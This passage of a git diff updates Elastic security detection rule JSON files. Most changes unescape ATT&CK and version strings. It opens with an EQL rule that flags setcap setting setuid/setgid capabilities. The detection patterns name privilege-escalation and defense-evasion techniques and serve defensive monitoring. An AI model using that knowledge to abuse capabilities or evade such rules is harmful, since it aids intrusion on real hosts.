"logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Setcap setuid/setgid Capability Set", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"setcap\" and process.args : \"cap_set?id+ep\" and not process.parent.name : \"jem\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f5c005d3-4e17-48b0-9cd7-444d48857f97", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "f5c005d3-4e17-48b0-9cd7-444d48857f97_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json index 96ac5f36ed3..f460939c8ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_1.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json index 82512519774..4382a33e49a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_2.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json index e69cae56b8e..bb95e9a19bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json +++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_3.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json index fcc455b50cc..ed372184597 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_4.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json index 22e13c4c44d..b70e8b47d9f 100644 --- a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_5.json @@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json index 17381a95105..5b22add0c73 100644 --- a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json index a9d7aa719a4..2980adb9800 100644 --- a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json index f4836e101b8..56ab19fe845 100644 --- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_104.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json index bcc257e6db0..76663b12230 100644 --- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_105.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json index 4e22a461952..8d396365503 100644 --- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_106.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json index e29d8be6856..686e1b1d2ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_107.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json index 2a3cc3874a6..38a87137424 100644 --- a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_108.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json index 6f169fb9bda..ce160c5d082 100644 --- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_104.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "f675872f-6d85-40a3-b502-c0d2ef101e92", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json index f65428f8cea..857ad1f2586 100644 --- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json index 852b64804ea..ae0d7fe209b 100644 --- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_106.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json index 768e27520e1..8db4c16a5e1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_107.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json index 0954c06c7da..053729f9498 100644 --- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json index baf74cc9653..bdc69445b83 100644 --- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json index 43cf455fe8e..a49eef0bfca 100644 --- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json index 628fd381f16..0d9c12807d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json index 1c769a5aa56..ef35625b20c 100644 --- a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json index c2bfee2da44..86d69bb8ee4 100644 --- a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json index 0a62b209682..d1a267667b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json index c69ce6c84a7..cd457bde000 100644 --- a/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json +++ b/packages/security_detection_engine/kibana/security_rule/f766ffaf-9568-4909-b734-75d19b35cbf4_102.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json index 69ca3dd3f21..2b8e98f2b6a 100644 --- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json index e9f1dbd27d9..5345d91fcd5 100644 --- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_106.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json index 288eb62eb84..3be04e1aade 100644 --- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json index b67ec0b2469..c5130e1fd65 100644 --- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json +++ b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_208.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json index 5b62709a6fc..0a861ab6338 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json b/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json index 75adf3bdfc2..37d4d0a3d81 100644 --- a/packages/security_detection_engine/kibana/security_rule/f7769104-e8f9-4931-94a2-68fc04eadec3_2.json +++ 